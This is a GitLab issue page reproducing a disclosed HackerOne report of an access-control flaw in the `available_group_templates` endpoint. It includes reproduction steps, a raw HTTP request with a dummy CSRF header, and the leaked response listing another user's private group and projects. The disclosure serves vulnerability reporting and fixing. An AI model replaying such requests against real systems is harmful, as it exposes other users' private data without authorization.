Skip to content
GitLab Next
  • Menu
Projects Groups Snippets
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in / Register
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
    • Locked Files
  • Issues 44,048
    • Issues 44,048
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1,312
    • Merge requests 1,312
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Schedules
    • Test Cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages & Registries
    • Packages & Registries
    • Package Registry
    • Container Registry
    • Infrastructure Registry
  • Monitor
    • Monitor
    • Metrics
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #26103
Closed
Open
Issue created Jan 11, 2019 by GitLab SecurityBot@gitlab-securitybotReporter

Disclosure of Any User's Private Group Info by `available_group_templates`

HackerOne report #475240 by ngalog on 2019-01-06, assigned to asaba:

Summary: Lately gitlab allow user to create project from group template, the newly introduced endpoint didn't perform access control check, allowing unauthorized user to access the private group info of other users.

Steps To Reproduce:

  • Login gitlab.com
  • visit https://gitlab.com/users/ashleyjohnson/available_group_templates
  • In burp send the request to repeater
  • add this line in header
X-CSRF-Token: testing

The full request should look like

GET /users/ashleyjohnson/available_group_templates HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: X-CSRF-Token: testing
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: xxx
Upgrade-Insecure-Requests: 1

Then my private group new-jjj-groupaaa is leaked, and the all of the project name/namespace gitlab-ce are leaked too

leaked info

var target = $(".project-templates-buttons#custom-group-project-templates");
target.empty();
target.html("<div class=\"custom-project-templates\">\n<div class=\"border-top-0 expanded js-template-group-options template-group-options\">\n<div class=\"template-header d-flex align-items-center\">\n<div class=\"template-subgroup d-flex flex-fill align-items-center\">\n<div class=\"template-options-icon-container d-flex justify-content-center align-items-center append-right-10\">\n<svg class=\"s16 options-expanded-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-down\"><\/use><\/svg>\n<svg class=\"s16 options-collapsed-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-right\"><\/use><\/svg>\n<\/div>\n<div class=\"avatar-container s40\">\n<div class=\"btn-template-icon avatar s40 avatar-tile identicon bg4\">N<\/div>\n<\/div>\n<div class=\"template-subgroup-name prepend-left-5\">\n<strong>newsub<\/strong>\n<\/div>\n<\/div>\n<div class=\"template-subgroup-project-count\">\n<span class=\"badge badge-pill\">\n<strong>\n2\n<\/strong>\n<\/span>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"tempalte\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10227470/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\ntempalte\n<\/strong>\n<br>\n<div class=\"text-muted\">\nteamplte\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/tempalte\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"tempalte\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"tempalte\" name=\"project[template_name]\" type=\"radio\" value=\"tempalte\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"GitLab Community Edition\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10181735/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\nGitLab Community Edition\n<\/strong>\n<br>\n<div class=\"text-muted\">\nGitLab Community Edition (CE) is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/gitlab-ce\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"GitLab Community Edition\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"GitLab Community Edition\" name=\"project[template_name]\" type=\"radio\" value=\"GitLab Community Edition\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<\/div>\n\n<\/div>\n");
target.trigger("ajax:success");

Impact

leaked this info to any unauthorised user

Screen_Shot_2019-01-06_at_10.35.55_PM.png

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screen_Shot_2019-01-06_at_10.35.55_PM.png
Assignee
Assign to
Time tracking